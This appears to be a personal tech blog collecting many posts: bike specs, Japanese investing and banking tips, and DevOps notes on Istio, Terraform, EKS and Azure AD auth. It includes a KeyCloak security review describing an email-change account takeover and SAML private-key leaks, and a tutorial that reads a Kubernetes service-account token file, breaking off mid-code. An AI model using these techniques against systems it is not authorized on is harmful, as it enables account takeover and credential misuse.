I bought a Vitus Zenium Road Bike (archive.org) in 2020 from Chain Reaction Cycles and as the years go by I keep going back to the product page to check the various details of the bike. Considering that the company releases a new version of the bike every year, I’m afraid that at some point the product page will be taken down, so I decided to copy all the information over here.

Intro

INTRODUCING THE AWARD-WINNING VITUS ZENIUM CARBON BIKE – READY TO TACKLE ANYTHING YOU THROW AT IT.

Local criteriums, speedy sportives, weekend club runs or your go-to winter training bike, the Zenium has you covered. Redeveloped to be a carbon frameset in 2019, we’ve now expanded the Zenium range for 2020.

The Zenium is designed to offer the perfect blend of comfort and performance for a great all-round riding experience. The compact geometry and slender dropped seat stays increase vertical compliance for a comfortable, balanced ride. The T700 HM-UD, disc brake specific, full carbon fork features a tapered carbon steerer for steering precision and inspiring handling, balancing confidence and control.

We’ve also allowed for more tire clearance, ensuring you can fit up to 32mm tires to tailor your ride. The frame is a fine balance of classic tube shapes and modern features, put together in a package that keeps weight to a minimum

Make no mistake, the Zenium wants to go fast! However, the subtle nods to all-day comfort ensure that if you are looking for a carbon road all-rounder, then the Zenium is for you.

The Vitus Zenium uses the reliable Shimano Tiagra 10 speed groupset, paired with TRP’s Spyre disc brakes and 160mm rotors.

Rolling on our Vitus clinchers, featuring 21mm internal rim widths, and a new, lighter set of hubs for 2020. These are paired with the super cool Vee Road Runner tan sidewall 28mm tires. The new Vitus Switch axles give you the option to leave the lever handle firmly secured in either wheel, or remove it for extra weight saving and aero gains. The cockpit is built with Vitus’ own 6061 Aluminium aero bar and stem, combined with a Vitus 27.2mm aluminium layback seatpost and our own tried and tested Vitus road saddle.

Specifications

Frame: Zenium UD Carbon T700 Internal cable routing, Flat Mount braking, PF30 BB Shell, 142 x 12
Fork: UD Carbon, Full Carbon tapered steerer, 100 x 12mm
Headset: Acros AiX-Low R3 Tapered 1 1/8”- 1 1/4”, upper bearing 41.8 / 28.6, lower bearing 47 / 33
Bottom Bracket: Prestine PF30 BB to fit 24mm axle
Handlebar: Vitus Aero AL6061, 128mm drop x 77mm reach
Stem: Vitus AL6061 3D Forged, bar bore 31.8mm, +/- 7 degrees
Grips: Vitus EVA Cork
Front Derailleur: Shimano Tiagra R4700
Rear Derailleur: Shimano Tiagra R4700, 10-Speed, Direct Mount
Shifters: Shimano Tiagra R4700
Brakes: TRP Spyre C610C
Rotors: Front: 160mm; Rear: 160mm
Crankset: Shimano Tiagra R4700 50-34T, 10-Speed
Chain: KMC X11, 10-Speed QUICK LINK
Cassette: Sunrace CSRX0 11-32T, 10-Speed
Front Hub: Vitus KT TZ5F-12, 12 x 100mm, CentreLock
Rear Hub: Vitus KT CRR6L4, 12 x 142mm, CentreLock
Rims: Vitus
Tyres: Vee Road Runner 700c x 28c, B-Proof Aramid Belt, Skinwall
Saddle: Vitus
Seat Post: Vitus AL6061, 27.2mm x 350mm, 12mm offset
Seatclamp: Vitus
Axles: Vitus 12mm Thru-Axles
Weight: 9.6kg (medium)

All-World ETFs for NISA

2022-12-27T00:00:00+00:00

My go-to investment is the Vanguard Total World Stock ETF (VT) that includes stocks in close to all companies of the world, so as long as the world economy does well, it goes up. Being a US-based security the dividends are subject to a 10% tax withholding in the US (regardless of me not having to file US taxes). This is not an issue for regular investments, as Japan levies a 20% tax on dividends and due to the tax treaty with the US I can deduct the already paid 10% and only pay the other 10% in Japan (I’m using Interactive Brokers, so I’m doing this myself when filing my taxes).

However I also started doing NISA recently, which is tax-exempt, so I don’t need to pay taxes in Japan on neither the capital gains nor the dividends. But this does not affect the 10% dividend tax levied in the US. So I set out to find a comparable investment that is domiciled outside the US.

Some international sites recommend Irish domiciled world ETFs as an alternative, like the Vanguard FTSE All-World UCITS ETF (VWRA), however this has an expense ratio of 0.22% which is quite high compared to VT’s 0.07%.

Another alternative I looked at was Japanese domiciled securities, since there I could potentially also save the conversion fee. Japanese Wikipedia has a list and retirewiki.jp also has the cheaper options, and an eye-opening explanation on the triple taxation problem. This helped me narrow down my search to two options: eMaxis Slim All Country (ｅＭＡＸＩＳＳｌｉｍ全世界株式（オール・カントリー）) (fee: 0.1144％) and MAXIS All Country ETF (ＭＡＸＩＳ全世界株式（オール・カントリー）上場投信) (fee: 0.0858％). Both of these are relatively young (eMAXIS one started in 2017 and the MAXIS one started in 2020, compared to VT’s 2008 start), but both of these are offered by MUFG, one of the major banks of Japan, which makes it pretty reliable in my opinion.

The difference between the two is described by Rakuten: eMAXIS Slim is a mutual fund (投資信託) and MAXIS is an ETF (上場投信). They are similar (as they are investing in the same underlying assets), but there are a few differences:

the mutual fund is traded once a day, while the ETF is traded during the stock market opening hours, like regular stocks. You can place limit orders for ETFs (e.g. buy 10 units if the price goes below 10,000 yen)
the holding fees are a bit higher for the mutual fund: 0.0858％ vs 0.1144％, but the difference is minimal: 0.0286% which is 343 yen for 1,200,000 yen (purchase fee is zero for both - at Rakuten and SBI)
you can invest any amount to the mutual fund, while from the ETF one needs to buy full units.

For me the last one matters: in NISA one can invest up to 1,200,000 yen a year, so I want to invest 100,000 yen each month. However with ETFs it’s never exactly 100,000 yen and at the end of the year I need to check and purchase more to get close to the limit, so I decided to go with the mutual fund eMaxis Slim. Moreover SBI now has a campaign, 投信マイレージサービス where they give 0.042% of the investment value as points each year, effectively lowering the holding fee to 0.0724% bringing it inline with Vanguard’s VT.

Shared bank account for non-married couples in Japan

2022-05-07T00:00:00+00:00

The internet wisdom seems to agree that shared accounts (or joint accounts) are illegal and impossible in Japan. As a workaround some banks will issue a second card in the name of the spouse (e.g. SMBC), however that’s generally only available for married couples.

So if you live with a partner, but not married, you are out of luck? Not entirely.

The solution is a pre-paid debit card called Kyash (affiliate link).

Kyash is a pre-paid VISA debit card that comes with a mobile app. You can top it up multiple ways, including linking a bank account, at an ATM or from a debit card. Then you can spend the money with the very stylish card.

Kyash also allows shared balances, that multiple Kyash users can add money to and withdraw money from. Moreover members added to the shared balance can assign their card to that balance (instead of their main account), so any payment maid with the card will be taken from the shared account. These payments send push notification to every member of the shared balance, and the account history also shows whose card made a given payment. Moreover any member can easily (and for free) move money between the shared account and their own account (which again sends a push notification to all members).

This for all intents and purposes can act as a shared account to cover shared expenses.

Here is how we use it with my partner to cover shared expenses (e.g. groceries):

At the beginning of each month we both put an agreed amount of money into the shared balance (we both have our main bank account linked to Kyash)
We both added our card to PayPay, so we can use it at places that don’t take card but take PayPay
For places that are cash-only, we take the money out from the shared balance into our individual balance (which is used next month when topping up the shared account)

Things that don’t work:

Since this is not a real bank account, direct debit (often used to pay rent) is not possible. The way we get around this is that I’ve setup direct debit with my own bank account, and I put that much less into the shared account
Places that expect credit cards don’t always work (e.g. car rental, highway payment gates, gas stations). We either use cash or a personal credit card, and then take the money from the shared account for these.

Bonus point: there is 1% cashback (up to a monthly limit), which is nice 🤑.

Online party games for a multi-lingual family

2021-12-28T00:00:00+00:00

My partner is Japanese, and speaks English, while my family is Hungarian and speak varying levels of English. This Christmas we had an online board game/party game session, and I got to pick the games.

First idea was one of the JackBox games, however these require a very high level of English and American pop-culture knowledge, so would probably not have been fun. Among Us was also an option, but I expected that my family would speak Hungarian while playing, so wanted something where my partner could also understand what’s going on (even without speaking Hungarian).

These are the games that fit these criterias:

https://logoquiz.net/ - guess the brand based on the logo. Company logos are pretty universal, and the names are the same everywhere. The only problem was that it was too easy and also started to repeat after a short time.
Map Quiz - this quiz is to find major cities of the world. A bit easy, but it looks nice. The same site has other map quizes that might be fun too
Country Quiz - we spent a lot of time with this one. It’s guessing the country based on the map, but the site looks really nice and gives some extra info on each country. Also if you get a few right, then it gets harder and rotates the map
Movie Quiz - guess the film from a picture. It was fun, sometimes easy, sometimes hard, and a bit short

Overall we had around an hour of fun.

snyk test docker --fail-on= workaround

2021-10-07T00:00:00+00:00

I’m running Snyk to scan docker images and break the build if they have high or critical vulnerabilities:

snyk test --severity-threshold=high --docker $IMAGE_NAME

However sometimes the upstream image has high or critical vulnerabilities (e.g. at the times of writing this, debian), so there is very little action one can take (other than moving to a different base image, which is usually not easy). Thus I only want to break the build if there are high or critical vulnerabilities AND they can be fixed by ugrading the base image.

snyk CLI has the --fail-on=all|upgradable|patchable option that says

Only fail when there are vulnerabilities that can be fixed.

which would be perfect, but it’s broken for docker scans. Thus I had to come up with a workaround:

snyk test --severity-threshold=high --docker $IMAGE_NAME --json-file-output=/tmp/out.json || if cat /tmp/out.json | jq '.docker.baseImageRemediation.code' | grep -q "NO_REMEDIATION_AVAILABLE"; then return 0; else return 1; fi

This scans the image, saves the output to json. If the scan failed, then parses the json to look for the .docker.baseImageRemediation.code that will tell whether NO_REMEDIATION_AVAILABLE or REMEDIATION_AVAILABLE. And only fail the build if there is remediation available.

Multi-cluster multi-primary istio on AWS EKS

2021-09-22T00:00:00+00:00

Recently I was working on setting up istio in a multi-cluster setup following the Install Multi-Primary on different networks guide on EKS clusters. Everything seemed to work (no errors in logs), until I reached the verification step, where requests didn’t go to the other mesh: in CLUSTER1 I always got a response from Hello version: v1, instance: helloworld-v1-86f77cd7bd-cpxhv, while in CLUSTER2 always from Hello version: v2, instance: helloworld-v2-758dd55874-6x4t8.

I also implemented this workaround as a shell script running in a CronJob, check it out here.

This turns out to be a known problem with EKS and comes down to the fact that EKS loadbalancers use hostnames instead of IP addresses, which are not supported by istio.

Workaround: manually resolve the IP and add it to istio ConfigMap (namespace: istio-system).

1. Figure out the eastwestgateway’s hostname

➜  kubectl get service -n istio-system --context=${CLUSTER1} istio-eastwestgateway -o yaml

at the bottom look for the status section like:

...
status:
  loadBalancer:
    ingress:
    - hostname: a5e21e07fd1a64a518ab6c02b4dfb9f5-826145575.us-west-2.elb.amazonaws.com

Also take a note of the topology.istio.io/network label, e.g. network1. We will use it when configuring the ConfigMap in the other cluster.

2. Figure out the corresponding IP address

➜  dig +short a5e21e07fd1a64a518ab6c02b4dfb9f5-826145575.us-west-2.elb.amazonaws.com
1.2.3.4
1.2.3.5

3. Update the istio ConfigMap in the other cluster

First get the existing ConfigMap:

➜  kubectl get configmaps -n istio-system istio -o yaml --context=${CLUSTER2} > istio_configmap_cluster2.yaml

Look for data.meshNetworks, e.g.:

apiVersion: v1
data:
  mesh: |-
    defaultConfig:
      discoveryAddress: istiod.istio-system.svc:15012
      meshId: mesh
      proxyMetadata: {}
      tracing:
        zipkin:
          address: zipkin.istio-system:9411
    enablePrometheusMerge: true
    rootNamespace: istio-system
    trustDomain: cluster.local
  meshNetworks: 'networks: {}'
kind: ConfigMap
...

Extend data.meshNetworks with the information from the previos steps:

apiVersion: v1
data:
  mesh: |-
    defaultConfig:
      discoveryAddress: istiod.istio-system.svc:15012
      meshId: mesh
      proxyMetadata: {}
      tracing:
        zipkin:
          address: zipkin.istio-system:9411
    enablePrometheusMerge: true
    rootNamespace: istio-system
    trustDomain: cluster.local
  meshNetworks: |-
      networks:
        network1:
          endpoints:
            - fromRegistry: cluster1
          gateways:
            - address: 1.2.3.4
              port: 15443
            - address: 1.2.3.5
              port: 15443
kind: ConfigMap
...

Save the file, apply the changes:

➜  kubectl apply --context=${CLUSTER2} -f istio_configmap_cluster2.yaml

4. Repeat the same for the other cluster

Warnings

according to this comment we should list all networks in all clusters (even the cluster’s own network)
hardcoding the IP like this will break if the ELB gets a new IP. In the thread there is a great discussion whether this will happen or not
- one possible solution to this is to have a CronJob that periodically updates the IPs

Terraform's kubernetes_secret giving 'Error: Provider produced inconsistent result after apply'

2021-09-17T00:00:00+00:00

I’m creating a new kubernetes_secret via Terraform for an existing service account like this:

resource "kubernetes_secret" "my_service_account_token" {
  metadata {
    name = "my-service-account-token"
    namespace = "example"
    annotations = {
      "kubernetes.io/service-account.name" = "my-service-account"
    }
  }
  type = "kubernetes.io/service-account-token"
}

so that then I can use this token elsewhere like: kubernetes_secret.my_service_account_token.data["token"].

However applying this gave the following error:

╷
│ Error: Provider produced inconsistent result after apply
│ 
│ When applying changes to
│ module.my_module.kubernetes_secret.my_service_account_token,
│ provider
│ "provider[\"registry.terraform.io/hashicorp/kubernetes\"].kubernetes"
│ produced an unexpected new value: Root resource was present, but now
│ absent.
│ 
│ This is a bug in the provider, which should be reported in the provider's
│ own issue tracker.
╵

Turns out if the service account referenced in the kubernetes.io/service-account.name annotation doesn’t exist, then kubernetes will delete this secret immediately. This makes terraform confused, when it creates the secret successfully and then tries to read it back, but it’s no longer there.

Solution: make sure the service account exist before applying this resource.

How to setup Azure AD authentication with AWS EKS kubernetes clusters

2021-08-21T00:00:00+00:00

I recently worked on setting up Azure Active Directory (AAD from now) authentication with kubernetes clusters running on AWS EKS (Amazon Elastic Kubernetes Service). The goal was to let users of the kubernetes cluster authenticate using their AAD identities, and assing permissions using the usernames and also AAD groups. Here is how I did it.

We will use OIDC-based authentication, as it’s supported by kubernetes and AAD as well.

Setup an AAD Enterprise Application

To use OIDC with AAD, we need an enterprise application. There is a soon-to-be-deprecated Azure client for kubectl, which describes setting up two applications, however it is doable with only one as well (we are still looking into whether this is secure though and I also opened an issue asking it).

Create an AAD Enterprise Application, then create the corresponding App Registration. In the App Registration config, under Authentication enable the Allow public client flows option. If you want groups to be part of the OIDC token, under API permissions setup the permissions to access group information, and under Token configuration click Add groups claim. Select Group ID as there is a catch here:

The supported formats for group claims are:

Azure Active Directory Group ObjectId (Available for all groups)

sAMAccountName (Available for groups synchronized from Active Directory)

NetbiosDomain\sAMAccountName (Available for groups synchronized from Active Directory)

DNSDomainName\sAMAccountName (Available for groups synchronized from Active Directory)

On Premises Group Security Identifier (Available for groups synchronized from Active Directory)

So what happens with the groups created on AAD, if you select e.g. sAMAccountName? They just don’t show up at all in the claim (this took me a while to figure out). GroupIDs look something like 093fc0e2-1d6e-4a1b-9bf8-effa0196f1f7 (source), so they are not really descriptive (especially when used in RoleBindings). On the other hand AAD group names can be changed and also not guaranteed to be unique, so not using them for authorization likely prevent a set of priviledge escalation vulnerabilites.

Go to the App Registration Overview page and copy the value of the Application (client) ID and the Directory (tenant) ID. We will need these in the next step.

Configure EKS

EKS being a managed kubernetes platform, we can’t directly pass parameters to the API server (like --oidc-issuer-url), however luckily EKS provides a way to configure these on the management console. You only need to do one of the next two.

Manual configuration

Go to EKS and choose Clusters
Select your cluster
In the middle of the page select Configuration
Select Authentication
Click Associate Identity Provider
Fill out like this:
- Issuer URL: https://sts.windows.net/[Directory (tenant) ID from the previous step]/ (e.g. https://sts.windows.net/b9a84eb8-a888-4f41-bb75-43447e36486a/)
- Client ID: [Application (client) ID from the previous step]
- Username claim: upn
- Groups claim: groups
- Username prefix: aad: (optional, will be added as a prefix to user identities and used in k8s RBAC)
- Groups prefix: aad: (same as the username prefix, but used for groups)
Save and wait until it gets applied

Configure via Terraform

The AWS terraform module support configuring this via the aws_eks_identity_provider_config like this:

resource "aws_eks_identity_provider_config" "example" {

  cluster_name = aws_eks_cluster.example.name

  oidc {
    identity_provider_config_name = "AzureAD" # display name that will show up on the AWS console
    client_id                     = "[Application (client) ID from the previous step]"
    issuer_url                    = "https://sts.windows.net/[Directory (tenant) ID from the previous step]/"
    username_claim                = "upn"
    username_prefix               = "aad:"
    groups_claim                  = "groups"
    groups_prefix                 = "aad:"
  }

  timeouts {
    create = "2h" # optional, but it timed out for me with the default
    delete = "2h" # optional, but it timed out for me with the default
  }
}

This finishes the cluster setup.

Configure the clients

Now we need to setup kubectl to authenticate via AAD. I looked into 3 different options:

int128/kubelogin: very user-friendly as it opens the browser to perform the authentication, but 3rd-party software means additional risk. Also requires sharing the client secret with all the clients, which is more additional risk.
kubectl azure plugin: works well, already part of kubectl, however going to be deprecated and removed in the near future
Azure/kubelogin: recommended replacement for option #2, maintained by Microsoft

Thus I will use option #3.

Install Azure/kubelogin

Follow the installation instructions from https://github.com/Azure/kubelogin:

Install using homebrew:

brew install Azure/kubelogin/kubelogin

Install directly from Github

wget https://github.com/Azure/kubelogin/releases/latest/download/kubelogin-linux-amd64.zip
unzip kubelogin-linux-amd64.zip -d kubelogin
mv kubelogin/bin/linux_amd64/kubelogin /usr/local/bin/
rm -r kubelogin*

Configure kubectl

Configure the cluster:

kubectl config set-cluster "$CLUSTER_NAME" --server="$CLUSTER_ADDRESS"
kubectl config set "clusters.$CLUSTER_NAME.certificate-authority-data" $CLUSTER_CA_DATA

Configure the authentication (AAD_CLIENT_ID is the application (client) ID from the previous step, AAD_TENANT_ID is the directory (tenant) ID from the previous step. Only the ID, don’t need the full URL):

kubectl config set-credentials "azure-user" \
  --exec-api-version=client.authentication.k8s.io/v1beta1 \
  --exec-command=kubelogin \
  --exec-arg=get-token \
  --exec-arg=--environment \
  --exec-arg=AzurePublicCloud \
  --exec-arg=--server-id \
  --exec-arg=$AAD_CLIENT_ID \
  --exec-arg=--client-id \
  --exec-arg=$AAD_CLIENT_ID \
  --exec-arg=--tenant-id \
  --exec-arg=$AAD_TENANT_ID

Configure a context with these and activate it:

kubectl config set-context "$CLUSTER_NAME" --cluster="$CLUSTER_NAME" --user=azure-user
kubectl config use-context "$CLUSTER_NAME"

Usage

Once kubectl is configured, run a kubectl command, e.g.:

kubectl get pods
To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code B7D3SVXHV to authenticate.

Open the link, enter the code, complete the authentication. Close the tab when told to do so. Return to the terminal. You’ll likely see a message like this:

Error from server (Forbidden): pods is forbidden: User "aad:my_user@company.com" cannot list resource "pods" in API group "" in the namespace "default"

This means authentication was successful, but your user is not authorized to perform the requested action.

Authorization

Now that the authentication works, we can setup (Cluster)RoleBindings using these usernames and groups (observe the aad: prefix on both the usernames and groups. Change it if you used something else in the EKS config):

apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: team-admin-access
  namespace: default
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: admin
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: User
  name: aad:my_user@company.com
- apiGroup: rbac.authorization.k8s.io
  kind: User
  name: aad:other_user@company.com
# TODO (teammembers) add your email here if you need access
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: everyone-view-access
  namespace: default
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: view
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: aad:093fc0e2-1d6e-4a1b-9bf8-effa0196f1f7
  # corresponds to the 'All Engineers' group # optional note for future readers 
  # ref: https://portal.azure.com/#blade/Microsoft_AAD_IAM/GroupDetailsMenuBlade/Overview/groupId/093fc0e2-1d6e-4a1b-9bf8-effa0196f1f7

How to download the latest release from a Github repository

2021-08-19T00:00:00+00:00

We often want to download the latest release of an application from Github, however it used to be hard without knowing the latest version. But now we can do the followings:

https://github.com/<user>/<repo>/releases/latest takes you to the latest release page, e.g. https://github.com/Azure/kubelogin/releases/latest
https://github.com/<user>/<repo>/releases/latest/download/<filename> gets you a binary from the latest release, e.g. https://github.com/Azure/kubelogin/releases/latest/download/kubelogin-linux-amd64.zip

Moving a blog from Wordpress to Github pages

2021-08-09T00:00:00+00:00

This blog is hosted on Github pages, which I end up liking a lot, so I decided to move my other blog (originally hosted on Wordpress) too. I was already planning to update the domain of that blog, so I took the opportunity to do both at the same time. Here are the steps I did.

The original, self-hosted Wordpress blog was on https://japan.szabo-simon.hu, that I wanted to move to https://hu.szabo.jp. So first I setup a new Github pages repo with that domain and the basic style files.

Then I followed this guide to get the posts and Wordpress-hosted images over: https://www.deadlyfingers.net/code/migrating-from-wordpress-to-github-pages. I kept the posts html, and didn’t convert them to md, as html worked already.

Migrating Google Photos

I had a lot of photos sourced from Google Photos public albums (one album per post) added to the post using this addon. Getting them over was a bit tricky and I ended up writing a script for it, then run it in a docker container:

docker run --rm -v $(pwd):/srv -u 0:0 -it wernight/phantomjs /bin/bash

I had to install https://github.com/lefuturiste/google-photos-album-crawler like this:

apt update
apt install npm -y
cd /root
mdkir abc
cd abc
npm install scrape-google-photos

Then run this script:

cd /srv/_posts/
for file in $(find -type f -name '*.html'); do
  echo "> Working with $file"; 
  if (grep -Po '\[embed-google-photos-album link="([^"]*)"[^\]]*\]' $file); then
    # Add gallery
    sed -i 's/status: publish/status: publish\ngallery: true/' $file
    link=$(grep -Po '\[embed-google-photos-album link="([^"]*)"[^\]]*\]' $file | grep -Po 'https://photos.app.goo.gl/[^"]+')
    echo "Google album link $link"
    mkdir /srv/assets/$file
    var=1
    for photo in $(/root/abc/node_modules/scrape-google-photos/index.js $link | grep -Po "https://lh3.googleusercontent.com[^']+"); do
      echo $photo
      wget -O /srv/assets/$file/$var.jpg $photo=w1920-h1080
      var=$((var + 1))
    done
  fi
done

This added gallery: true tag to the posts, grabbed all images from the albums and placed them into separate folders under assets/ named the same as the posts. The gallery: true tag was already configured to make jekyll pick up the images from the folder named the same as the post.

Somehow this resulted in a lot of duplicate photos, so I had to remove them (code from SO):

declare -A arr
shopt -s globstar
arr=()

for file in **; do
  [[ -f "$file" ]] || continue
   
  read cksm _ < <(md5sum "$file")
  if ((arr[$cksm]++)); then 
    rm $file
  fi
done

Re-embed YouTube videos

Then I had to fix embedded YouTube videos, as they ended up being something like:

<p><!-- wp:embed {"url":"https://www.youtube.com/watch?v=U0CL-ZSuCrQ","type":"video","providerNameSlug":"youtube","responsive":true,"className":"wp-embed-aspect-16-9 wp-has-aspect-ratio"} --></p>
<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio">
<div class="wp-block-embed__wrapper">
https://www.youtube.com/watch?v=U0CL-ZSuCrQ
</div>
</figure>
<p><!-- /wp:embed --></p>

Sometimes the YouTube URL was like https://youtu.be/Dd7FeNkoVjI, which had to be handled too. So I did a global search and replace (with VS Code’s built-in tool) from

<div class="wp-block-embed__wrapper">\n(?:https://www.youtube.com/watch\?v=(\S+)|https://youtu.be/(\S+))\n</div>

<iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/$1$2" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>

Make links relative

Next was all the links between posts, which were all absolute (like https://japan.szabo-simon.hu/2021/05/04/biwaichi-biciklivel-a-biwa-to-korul/) and as I was updating the domain, I had to update these too. I decided to use this opportunity to also make them relative (e.g. /2021/05/04/biwaichi-biciklivel-a-biwa-to-korul/) with this regex search and replace:

https://japan.szabo-simon.hu([^"]+/)"

$1"

Setup redirect to keep old links working

Last step was to add an automatic redirect to the old site via .htaccess in the site’s root:

Redirect 301 / https://hu.szabo.jp/

This keeps the path on redirect, and since the export tool saved the paths for the posts, all the old links still work.

The security of KeyCloak used as an identity proxy

2021-07-05T00:00:00+00:00

Recently I was involved in a project where KeyCloak was used as an identity proxy: the target app was configured to use KeyCloak as an SSO, but KeyCloak delegated the authentication further to an other IdP. So on login to the target app, the app would redirect the user to KeyCloak, which would further redirect to the IdP’s login page. Upon authenticating there, the IdP redirected back to KeyCloak, which redirected to the target app. This double-redirect flow happened very fast so it was mostly transparent to the user.

My task was to review the security of this setup and I managed to find a few interesting bugs.

Full account takeover

So in KeyCloak users are allowed to change their email address, but they need to verify it. However since KeyCloak was using the IdP to login users, this requirement didn’t make sense and was turned off. So any user could change their email address on their profile page without any sort of verification:

Since the target app was configured to use this email address for authenticating the user, this meant that any user could takeover anyone else’s account. Sweet.

The fix: configure KeyCloak to send the username instead of the email address to the target app, as the username can’t be changed.

Leaking SAML private keys in logs and export

Detailed logging with Include Representation was enabled for Admin Events:

This meant that on editing the SAML client config, the private key got logged:

As this key is used to sign the SSO request from the target app, someone with this key can impersonate any user to the target app without every having to interact with KeyCloak.

As logs will be shipped out of the system and available to people without access to the system, this was especially alarming.

The same key is part of the exported configuration, and is also visible on the UI, so limiting admin access is crucial.

The fix: as a potential quick-fix disable detailed logging, but that will impact the usefulness of logs.

Impersonation as a service

This is not really a bug, more of a feature of KeyCloak: admins can impersonate any user by clicking a button:

This is something to keep in mind and at least setup some alerting for it, if it happens. Keep in mind though that an admin can still reset the users’ password or view the SAML private keys, so disabling impersonation is not the only thing you need to worry about if you are concerned about privileged attackers. But it’s a good start.

Authentication using kubernetes service account JWTs

2021-05-24T09:00:00+00:00

Permissions for a Pod in kubernetes are managed via Service Accounts, and these come with a JWT issued by the cluster. If the Pods need to authenticate to an external service, it would be reasonable to use this JWT, so let’s see how to get it and verify it.

This JWT can also be used to call the Kubernetes API, as described very well in this article. I definitely recommend reading that, as I won’t be going into so much detail on the ServiceAccount and RBAC part.

Setup

Make sure you have a cluster (e.g. minikube) setup, and kubectl authenticated.

Create a new namespace and service account:

➜  kubectl apply -f - <<EOF
apiVersion: v1
kind: Namespace
metadata:
  name: my-namespace
EOF

➜  kubectl apply -f - <<EOF
apiVersion: v1
kind: ServiceAccount
metadata:
  name: my-service-account
  namespace: my-namespace
EOF

Start an image in the namespace with the service account and open bash into it. Then install curl and jq:

➜  kubectl run -it --rm --restart=Never ubuntu --image=ubuntu bash --namespace=my-namespace --serviceaccount=my-service-account
If you don't see a command prompt, try pressing enter.
root@ubuntu:/# apt update && apt install -y curl jq

Get the token in a Pod

Now that we have the shell into a container, let’s find the token. Based on the docs all we have to do is:

# Point to the internal API server hostname
APISERVER=https://kubernetes.default.svc

# Path to ServiceAccount token
SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount

# Read this Pod's namespace
NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)

# Read the ServiceAccount bearer token
TOKEN=$(cat ${SERVICEACCOUNT}/token)

# Reference the internal certificate authority (CA)
CACERT=${SERVICEACCOUNT}/ca.crt

# Explore the API with TOKEN
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api

This is a great start, as it shows that the /var/run/secrets/kubernetes.io/serviceaccount/token file holds the JWT token, and the /var/run/secrets/kubernetes.io/serviceaccount/ca.crt holds the ca cert used by the Kubernetes API server.

Getting the certificate to verify the JWT

Unfortunately the ca.crt. file is not the certificate used for the JWT. To get that, we need to hit the /.well-known/openid-configuration endpoint. Based on the previous example:

# Point to the internal API server hostname
APISERVER=https://kubernetes.default.svc

# Path to ServiceAccount token
SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount

# Read this Pod's namespace
NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)

# Read the ServiceAccount bearer token
TOKEN=$(cat ${SERVICEACCOUNT}/token)

# Reference the internal certificate authority (CA)
CACERT=${SERVICEACCOUNT}/ca.crt

# Explore the API with TOKEN
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/.well-known/openid-configuration | jq

jq is used only to pretty-print the json. This will return something like:

{
  "issuer": "https://kubernetes.default.svc.cluster.local",
  "jwks_uri": "https://192.168.64.2:8443/openid/v1/jwks",
  "response_types_supported": [
    "id_token"
  ],
  "subject_types_supported": [
    "public"
  ],
  "id_token_signing_alg_values_supported": [
    "RS256"
  ]
}

The jwks_uri holds the JSON Web Key Sets. Calling that URL with the same bearer token:

curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET https://192.168.64.2:8443/openid/v1/jwks | jq

will return something like this:

{
  "keys": [
    {
      "use": "sig",
      "kty": "RSA",
      "kid": "BPlcMy7AywKBfLhl67WEfBoRklvuovLWXk-y79NbOxc",
      "alg": "RS256",
      "n": "tqzzgxqEkP7yZDwWGPwrFjlf8Ga7KExEQzPaF2VdtnLn1Xec5C2EDfwgXkr5irttvL7_CtItKh8SKjMjwrYZcoIagebIC5mRX3r4mqnG4z501_XtaYNxFSsPfbQz1yjrxr-07d3AyNmO_vbRHftNg3XJTyH5koG3oNS1k5eFZb8mq_drnAJ3rDEs9DAkoCMrv43EXiAOGosnHSUWGobVMBvn53jsfekq-eksT3uRLamKWaisXxqPlkzaqLzY2dIimFfFFPe3Q3OJEFIDqimFZKTaQu3JoMR2V2rTI_vXVCcvmMN0UZtGarr_Zaqx7eR7x2i-7X8Hd-6pWpOjmJNc8w",
      "e": "AQAB"
    }
  ]
}

This can be parsed using a library like https://github.com/MicahParks/keyfunc and the result can then be passed to https://github.com/square/go-jose to verify the token.

When calling the URLs make sure not to use double / (e.g. https://kubernetes.default.svc//.well-known/openid-configuration) as that can lead to permission errors.

JWT content

The JWT has a payload, similar to:

{
  "iss": "kubernetes/serviceaccount",
  "kubernetes.io/serviceaccount/namespace": "my-namespace",
  "kubernetes.io/serviceaccount/secret.name": "my-service-account-token-p95dr",
  "kubernetes.io/serviceaccount/service-account.name": "my-service-account",
  "kubernetes.io/serviceaccount/service-account.uid": "7bbebda6-5b05-4ae4-9b86-0d8145c077a5",
  "sub": "system:serviceaccount:my-namespace:my-service-account"
}

This contains both the namespace and the service account names, which can be used for authorization.

Code example

Live demo (tends to timeout due to imports, so you might need to run it multiple times)

package main

import (
	"crypto/rsa"
	"encoding/json"
	"fmt"
	"log"

	"github.com/MicahParks/keyfunc"
	gojose2 "gopkg.in/square/go-jose.v2"
)

func main() {
	// cat /var/run/secrets/kubernetes.io/serviceaccount/token
